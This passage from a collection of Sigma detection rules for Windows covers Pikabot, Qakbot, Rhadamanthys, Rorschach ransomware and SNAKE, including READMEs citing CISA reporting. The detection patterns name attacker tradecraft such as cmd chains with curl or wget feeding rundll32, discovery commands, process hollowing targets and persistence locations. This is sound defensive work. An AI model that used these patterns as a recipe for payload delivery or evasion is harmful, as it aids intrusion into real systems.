    "content": "title: Potential Pikabot C2 Activity\nid: cae6cee6-0244-44d2-84ed-e65f548eb7dc\nstatus: test\ndescription: |\n    Detects the execution of rundll32 that leads to an external network connection.\n    The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries.\nreferences:\n    - https://www.virustotal.com/gui/file/d72af640b71b8e3eca3eba660dd7c7f029ff8852bcacaa379e7b6c57cf4d9b44\n    - https://www.virustotal.com/gui/file/6bb4cdbaef03b732a93559a58173e7f16b29bfb159a1065fae9185000ff23b4b\n    - https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_06.12.2023.txt\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2023-10-27\nmodified: 2024-01-26\ntags:\n    - attack.command-and-control\n    - attack.t1573\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: network_connection\n    definition: 'Requirements: By default the network_connection type event might not contain the ParentImage. Make sure you collect such fields in order to use this rule'\ndetection:\n    selection:\n        ParentImage|endswith: '\\rundll32.exe'\n        Image|endswith:\n            # Note: Only add processes seen used by Pikabot to avoid collision with other strains of malware\n            - '\\SearchFilterHost.exe'\n            - '\\SearchProtocolHost.exe'\n            - '\\sndvol.exe'\n            - '\\wermgr.exe'\n            - '\\wwahost.exe'\n        Protocol: tcp\n        Initiated: 'true'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml",
    "content": "title: Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE\nid: e5144106-8198-4f6e-bfc2-0a551cc8dd94\nstatus: test\ndescription: |\n    Detects the execution of concatenated commands via \"cmd.exe\". Pikabot often executes a combination of multiple commands via the command handler \"cmd /c\" in order to download and execute additional payloads.\n    Commands such as \"curl\" and \"wget\" are used to download extra payloads, \"ping\" and \"timeout\" are abused to introduce delays in the command execution, and \"Rundll32\" is used to execute malicious DLL files.\n    In the observed Pikabot infections, a combination of the commands described above is used to orchestrate the download and execution of malicious DLL files.\nreferences:\n    - https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_30.10.2023.txt\n    - https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_22.12.2023.txt\nauthor: Alejandro Houspanossian ('@lekz86')\ndate: 2024-01-02\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.execution\n    - attack.t1059.003\n    - attack.t1105\n    - attack.t1218\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_cmd:\n        CommandLine|contains|all:\n            - 'cmd'\n            - '/c'\n    selection_pipes:\n        CommandLine|contains:\n            - ' & '\n            - ' || '\n    selection_commands_1:\n        CommandLine|contains:\n            - ' curl'\n            - ' wget'\n            - ' timeout '\n            - ' ping '\n    selection_commands_2:\n        CommandLine|contains:\n            - ' rundll32'\n            - ' mkdir '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_discovery.yml",
    "content": "title: Potential Pikabot Discovery Activity\nid: 698d4431-514f-4c82-af4d-cf573872a9f5\nstatus: test\ndescription: |\n    Detects system discovery activity carried out by Pikabot, including the collection of network, user and domain group information.\n    The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute).\nreferences:\n    - https://www.virustotal.com/gui/file/72f1a5476a845ea02344c9b7edecfe399f64b52409229edaf856fcb9535e3242\n    - https://tria.ge/231023-lpw85she57/behavioral2\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2023-10-27\nmodified: 2024-01-26\ntags:\n    - attack.discovery\n    - attack.t1016\n    - attack.t1049\n    - attack.t1087\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\n    definition: 'Requirements: By default the process_creation type event might not contain the GrandParentImage. Make sure you collect such fields in order to use this rule'\ndetection:\n    selection_parent:\n        - GrandParentImage|endswith: '\\rundll32.exe'\n        - ParentImage|endswith:\n              - '\\SearchFilterHost.exe'\n              - '\\SearchProtocolHost.exe'\n    selection_child:\n        CommandLine:\n            # Note: Only add strings as seen used by Pikabot to avoid collision with other strains of malware\n            - 'ipconfig.exe /all'\n            - 'netstat.exe -aon'\n            - 'whoami.exe /all'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_hollowing.yml",
    "content": "title: Potential Pikabot Hollowing Activity\nid: d8937fe7-42d5-4b4d-8178-e089c908f63f\nstatus: test\ndescription: |\n    Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries.\n    The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries\nreferences:\n    - https://www.virustotal.com/gui/file/b6e8910fb9b3bb1fcddefd35ff0ed8624930d30d6977e11808c8330415685a62\n    - https://www.virustotal.com/gui/file/6bb4cdbaef03b732a93559a58173e7f16b29bfb159a1065fae9185000ff23b4b\n    - https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_06.12.2023.txt\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2023-10-27\nmodified: 2024-01-26\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055.012\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith: '\\rundll32.exe'\n        Image|endswith:\n            # Note: Only add processes seen used by Pikabot to avoid collision with other strains of malware\n            - '\\SearchFilterHost.exe'\n            - '\\SearchProtocolHost.exe'\n            - '\\sndvol.exe'\n            - '\\wermgr.exe'\n            - '\\wwahost.exe'\n    filter_main_legit_sndvol:\n        Image|endswith: '\\sndvol.exe'\n        ParentCommandLine|contains: 'mmsys.cpl'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_uncommon_extension.yml",
    "content": "title: Pikabot Fake DLL Extension Execution Via Rundll32.EXE\nid: 1bf0ba65-9a39-42a2-9271-31d31bf2f0bf\nstatus: test\ndescription: |\n    Detects specific process tree behavior linked to \"rundll32\" executions, wherein the associated DLL lacks a common \".dll\" extension, often signaling potential Pikabot activity.\nreferences:\n    - https://github.com/pr0xylife/Pikabot\n    - https://tria.ge/231004-tp8k6sch9t/behavioral2\n    - https://www.virustotal.com/gui/file/56db0c4842a63234ab7fe2dda6eeb63aa7bb68f9a456985b519122f74dea37e2/behavior\n    - https://tria.ge/231212-r1bpgaefar/behavioral2\nauthor: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-01-26\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\wscript.exe'\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains:\n            - ':\\ProgramData\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Installer\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\AppData\\Roaming\\'\n    filter_main_known_extension:\n        - CommandLine|contains:\n              - '.cpl '\n              - '.cpl,'\n              - '.dll '\n              - '.dll,'\n              - '.inf '\n              - '.inf,'\n        - CommandLine|endswith:\n              - '.cpl'\n              - '.cpl\"'\n              - '.dll'\n              - '.dll\"'\n              - '.inf'\n              - '.inf\"'\n              - \".cpl'\"\n              - \".dll'\"\n              - \".inf'\"\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Qakbot/README.md",
    "content": "# Qakbot\n\n## Summary\n\nQBot is a modular information stealer also known as Qakbot, Quakbot, Oakboat or Pinkslipbot.\n\nYou can find more information on the threat in the following articles:\n\n- [Qakbot - malpedia](https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot)\n- [Qakbot- pr0xylife](https://github.com/pr0xylife/Qakbot/)\n- [DOCUMENTS AND RESOURCES RELATED TO THE DISRUPTION OF THE QAKBOT MALWARE AND BOTNET](https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources)\n\n## Rules\n\n- [Qakbot Regsvr32 Calc Pattern](./proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml)\n- [Potential Qakbot Rundll32 Execution](./proc_creation_win_malware_qakbot_rundll32_execution.yml)\n- [Qakbot Rundll32 Exports Execution](./proc_creation_win_malware_qakbot_rundll32_exports.yml)\n- [Qakbot Rundll32 Fake DLL Extension Execution](./proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml)\n- [Qakbot Uninstaller Execution](./proc_creation_win_malware_qakbot_uninstaller_cleanup.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml",
    "content": "title: Qakbot Regsvr32 Calc Pattern\nid: 0033cf83-fb87-446d-9cac-43d63ad4d5a9\nstatus: test\ndescription: Detects a specific command line of \"regsvr32\" where the \"calc\" keyword is used in conjunction with the \"/s\" flag. This behavior is often seen used by Qakbot\nreferences:\n    - https://github.com/pr0xylife/Qakbot/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-26\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '\\regsvr32.exe'\n        CommandLine|contains|windash: ' -s'\n        CommandLine|endswith: ' calc'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_execution.yml",
    "content": "title: Potential Qakbot Rundll32 Execution\nid: cf879ffb-793a-4753-9a14-bc8f37cc90df\nstatus: test\ndescription: Detects specific process tree behavior of a \"rundll32\" execution often linked with potential Qakbot activity.\nreferences:\n    - https://github.com/pr0xylife/Qakbot/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-05-24\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_paths:\n        ParentImage|endswith:\n            # Note: Only add processes seen used by Qakbot to avoid collision with other strains of malware\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\curl.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wscript.exe'\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains:\n            # Note: Only add paths seen used by Qakbot to avoid collision with other strains of malware\n            - ':\\ProgramData\\'\n            - ':\\Users\\Public\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\AppData\\Roaming\\'\n    selection_extension:\n        CommandLine|contains: '.dll'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_exports.yml",
    "content": "title: Qakbot Rundll32 Exports Execution\nid: 339ed3d6-5490-46d0-96a7-8abe33078f58\nstatus: test\ndescription: Detects specific process tree behavior of a \"rundll32\" execution with exports linked with Qakbot activity.\nreferences:\n    - https://github.com/pr0xylife/Qakbot/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-05-24\nmodified: 2023-05-30\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_paths:\n        ParentImage|endswith:\n            # Note: Only add processes seen used by Qakbot to avoid collision with other strains of malware\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\curl.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wscript.exe'\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains:\n            # Note: Only add paths seen used by Qakbot to avoid collision with other strains of malware\n            - ':\\ProgramData\\'\n            - ':\\Users\\Public\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\AppData\\Roaming\\'\n    selection_exports:\n        CommandLine|endswith:\n            # Note: Only add additional exports seen used by Qakbot\n            - 'aslr' # https://tria.ge/230524-scgq9add9v/behavioral1#report\n            - 'bind'\n            - 'DrawThemeIcon'\n            - 'GG10'\n            - 'GL70'\n            - 'jhbvygftr'\n            - 'kjhbhkjvydrt'\n            - 'LS88'\n            - 'Motd'\n            - 'N115'\n            - 'next' # https://tria.ge/230530-n3rxpahf9w/behavioral2\n            - 'Nikn'\n            - 'print'\n            - 'qqqb'\n            - 'qqqq'\n            - 'RS32'\n            - 'Test'\n            - 'Time'\n            - 'Updt'\n            - 'vips'\n            - 'Wind'\n            - 'WW50'\n            - 'X555'\n            - 'XL55'\n            - 'xlAutoOpen'\n            - 'XS88'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml",
    "content": "title: Qakbot Rundll32 Fake DLL Extension Execution\nid: bfd34392-c591-4009-b938-9fd985a28b85\nstatus: test\ndescription: Detects specific process tree behavior of a \"rundll32\" execution where the DLL doesn't have the \".dll\" extension. This is often linked with potential Qakbot activity.\nreferences:\n    - https://github.com/pr0xylife/Qakbot/\nauthor: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-24\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith:\n            # Note: Only add processes seen used by Qakbot to avoid collision with other strains of malware\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\curl.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wscript.exe'\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains:\n            # Note: Only add paths seen used by Qakbot to avoid collision with other strains of malware\n            - ':\\ProgramData\\'\n            - ':\\Users\\Public\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\AppData\\Roaming\\'\n    filter_main_extension:\n        CommandLine|contains: '.dll'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_uninstaller_cleanup.yml",
    "content": "title: Qakbot Uninstaller Execution\nid: bc309b7a-3c29-4937-a4a3-e232473f9168\nstatus: test\ndescription: Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet\nreferences:\n    - https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources\n    - https://www.virustotal.com/gui/file/7cdee5a583eacf24b1f142413aabb4e556ccf4ef3a4764ad084c1526cc90e117/community\n    - https://www.virustotal.com/gui/file/fab408536aa37c4abc8be97ab9c1f86cb33b63923d423fdc2859eb9d63fa8ea0/community\nauthor: Florian Roth (Nextron Systems)\ndate: 2023-08-31\nmodified: 2023-09-01\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\QbotUninstall.exe'\n        - Hashes|contains:\n              - 'IMPHASH=E772C815072311D6FB8C3390743E6BE5'\n              - 'SHA256=423A9D13D410E2DC38EABB9FDF3121D2072472D0426260283A638B822DCD5180'\n              - 'SHA256=559CAE635F0D870652B9482EF436B31D4BB1A5A0F51750836F328D749291D0B6'\n              - 'SHA256=855EB5481F77DDE5AD8FA6E9D953D4AEBC280DDDF9461144B16ED62817CC5071'\n              - 'SHA256=FAB408536AA37C4ABC8BE97AB9C1F86CB33B63923D423FDC2859EB9D63FA8EA0'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Rhadamanthys/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml",
    "content": "title: Rhadamanthys Stealer Module Launch Via Rundll32.EXE\nid: 5cdbc2e8-86dd-43df-9a1a-200d4745fba5\nstatus: test\ndescription: Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023\nreferences:\n    - https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88\n    - https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/\n    - https://www.joesandbox.com/analysis/790122/0/html\n    - https://twitter.com/anfam17/status/1607477672057208835\nauthor: TropChaud\ndate: 2023-01-26\nmodified: 2023-02-05\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_rundll32:\n        - OriginalFileName: 'RUNDLL32.EXE'\n        - Image|endswith: '\\rundll32.exe'\n    selection_dll:\n        CommandLine|contains: 'nsis_uns'\n    selection_export_function:\n        CommandLine|contains: 'PrintUIEntry'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Rorschach/proc_creation_win_malware_rorschach_ransomware_activity.yml",
    "content": "title: Rorschach Ransomware Execution Activity\nid: 0e9e6c63-1350-48c4-9fa1-7ccb235edc68\nstatus: test\ndescription: Detects Rorschach ransomware execution activity\nreferences:\n    - https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-04-04\nmodified: 2023-04-22\ntags:\n    - attack.execution\n    - attack.t1059.003\n    - attack.t1059.001\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\bcdedit.exe'\n            - '\\net.exe'\n            - '\\net1.exe'\n            - '\\netsh.exe'\n            - '\\wevtutil.exe'\n            - '\\vssadmin.exe'\n        CommandLine|contains: '11111111'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/SNAKE/README.md",
    "content": "# SNAKE Malware\n\n## Summary\n\nOn May 9th 2023, CISA published a report detailing their investigations and analysis of the SNAKE malware that they attribute to the FSB. Here is a quick excerpt from the report.\n\n> The Snake implant is considered the most sophisticated cyber espionage tool designed and used by Center 16 of Russia’s Federal Security Service (FSB) for long-term intelligence collection on sensitive targets. To conduct operations using this tool, the FSB created a covert peer-to-peer (P2P) network of numerous Snake-infected computers worldwide. Many systems in this P2P network serve as relay nodes which route disguised operational traffic to and from Snake implants on the FSB’s ultimate targets. Snake’s custom communications protocols employ encryption and fragmentation for confidentiality and are designed to hamper detection and collection efforts\n\nYou can find more information on the threat in the following articles:\n\n- [Hunting Russian Intelligence “Snake” Malware](https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF)\n\n## Rules\n\n- [SNAKE Malware Kernel Driver File Indicator](./file_event_win_malware_snake_encrypted_payload_ioc.yml)\n- [SNAKE Malware Installer Name Indicators](./file_event_win_malware_snake_installers_ioc.yml)\n- [SNAKE Malware WerFault Persistence File Creation](./file_event_win_malware_snake_werfault_creation.yml)\n- [Potential SNAKE Malware Installation CLI Arguments Indicator](./proc_creation_win_malware_snake_installer_cli_args.yml)\n- [Potential SNAKE Malware Installation Binary Indicator](./proc_creation_win_malware_snake_installer_exec.yml)\n- [Potential SNAKE Malware Persistence Service Execution](./proc_creation_win_malware_snake_service_execution.yml)\n- [SNAKE Malware Covert Store Registry Key](./registry_event_malware_snake_covert_store_key.yml)\n- [Potential Encrypted Registry Blob Related To SNAKE Malware](./registry_set_malware_snake_encrypted_key.yml)\n- [SNAKE Malware Service Persistence](./win_system_malware_snake_persistence_service.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_encrypted_payload_ioc.yml",
    "content": "title: SNAKE Malware Kernel Driver File Indicator\nid: d6d9d23f-69c1-41b5-8305-fa8250bd027f\nstatus: test\ndescription: Detects SNAKE malware kernel driver file indicator\nreferences:\n    - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-10\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename: 'C:\\Windows\\System32\\Com\\Comadmin.dat'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_installers_ioc.yml",
    "content": "title: SNAKE Malware Installer Name Indicators\nid: 99eccc2b-7182-442f-8806-b76cc36d866b\nstatus: test\ndescription: Detects filename indicators associated with the SNAKE malware as reported by CISA in their report\nreferences:\n    - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-10\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '\\jpsetup.exe'\n            - '\\jpinst.exe'\n    condition: selection\nfalsepositives:\n    - Some legitimate software was also seen using these names. Apply additional filters and use this rule as a hunting basis.\nlevel: low\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_werfault_creation.yml",
    "content": "title: SNAKE Malware WerFault Persistence File Creation\nid: 64827580-e4c3-4c64-97eb-c72325d45399\nstatus: test\ndescription: Detects the creation of a file named \"WerFault.exe\" in the WinSxS directory by a non-system process, which can be indicative of potential SNAKE malware activity\nreferences:\n    - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-10\nmodified: 2023-05-18\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Windows\\WinSxS\\'\n        TargetFilename|endswith: '\\WerFault.exe'\n    filter_main_system_location:\n        Image|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_cli_args.yml",
    "content": "title: Potential SNAKE Malware Installation CLI Arguments Indicator\nid: 02cbc035-b390-49fe-a9ff-3bb402c826db\nstatus: test\ndescription: Detects a specific command line argument sequence seen used by SNAKE malware during its installation as described by CISA in their report\nreferences:\n    - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-04\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # This CLI regex is based on the following description from the report:\n        #   The jpsetup.exe installer requires two arguments to be passed via the command line for execution\n        #   The first argument is a wide character string hashed with SHA-256 twice -> We assume that the first argument is of length SHA256\n        #   The AES initialization vector (IV) consists of the first 16 bytes of the second argument to jpsetup.exe -> We assume that the second argument is of at least 16 bytes (16 characters)\n        CommandLine|re: '\\s[a-fA-F0-9]{64}\\s[a-fA-F0-9]{16}'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml",
    "content": "title: Potential SNAKE Malware Installation Binary Indicator\nid: d91ff53f-fd0c-419d-a6b8-ae038d5c3733\nstatus: test\ndescription: Detects a specific binary name seen used by SNAKE malware during its installation as described by CISA in their report\nreferences:\n    - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-04\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\jpsetup.exe'\n            - '\\jpinst.exe'\n    filter_main_cli_name:\n        CommandLine:\n            - 'jpinst.exe'\n            - 'jpinst'\n            - 'jpsetup.exe'\n            - 'jpsetup'\n    filter_main_cli_empty:\n        CommandLine: ''\n    filter_main_cli_null:\n        CommandLine: null\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_service_execution.yml",
    "content": "title: Potential SNAKE Malware Persistence Service Execution\nid: f7536642-4a08-4dd9-b6d5-c3286d8975ed\nstatus: test\ndescription: Detects a specific child/parent process relationship indicative of a \"WerFault\" process running from the \"WinSxS\" as a service. This could be indicative of potential SNAKE malware activity as reported by CISA.\nreferences:\n    - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-04\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\services.exe'\n        Image|startswith: 'C:\\Windows\\WinSxS\\'\n        Image|endswith: '\\WerFault.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/SNAKE/registry_event_malware_snake_covert_store_key.yml",
    "content": "title: SNAKE Malware Covert Store Registry Key\nid: d0fa35db-0e92-400e-aa16-d32ae2521618\nstatus: test\ndescription: Detects any registry event that targets the key 'SECURITY\\Policy\\Secrets\\n' which is a key related to SNAKE malware as described by CISA\nreferences:\n    - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-11\ntags:\n    - attack.persistence\n    - detection.emerging-threats\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: 'SECURITY\\Policy\\Secrets\\n'\n    condition: selection\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/SNAKE/registry_set_malware_snake_encrypted_key.yml",
    "content": "title: Potential Encrypted Registry Blob Related To SNAKE Malware\nid: 7e163e96-b9a5-45d6-b2cd-d7d87b13c60b\nstatus: test\ndescription: Detects the creation of a registry value in the \".wav\\OpenWithProgIds\" key with an uncommon name. This could be related to SNAKE Malware as reported by CISA\nreferences:\n    - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-10\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - detection.emerging-threats\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Classes\\.wav\\OpenWithProgIds\\'\n    filter_main_wav:\n        - TargetObject|endswith: '.AssocFile.WAV'\n        - TargetObject|contains: '.wav.'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Some additional tuning might be required to tune out legitimate processes that write to this key by default\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/SNAKE/win_system_malware_snake_persistence_service.yml",
    "content": "title: SNAKE Malware Service Persistence\nid: b2e60816-96b2-45bd-ba91-b63578c03ef6\nstatus: test\ndescription: Detects the creation of a service named \"WerFaultSvc\" which seems to be used by the SNAKE malware as a persistence mechanism as described by CISA in their report\nreferences:\n    - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-10\ntags:\n    - attack.persistence\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ServiceName|contains: 'WerFaultSvc' # Note: The report contains a \",\" in the name (\"WerFaultSvc,\"). Since we can't confirm if its a typo or not we don't use it\n        ImagePath|startswith: 'C:\\Windows\\WinSxS\\'\n        ImagePath|endswith: '\\WerFault.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
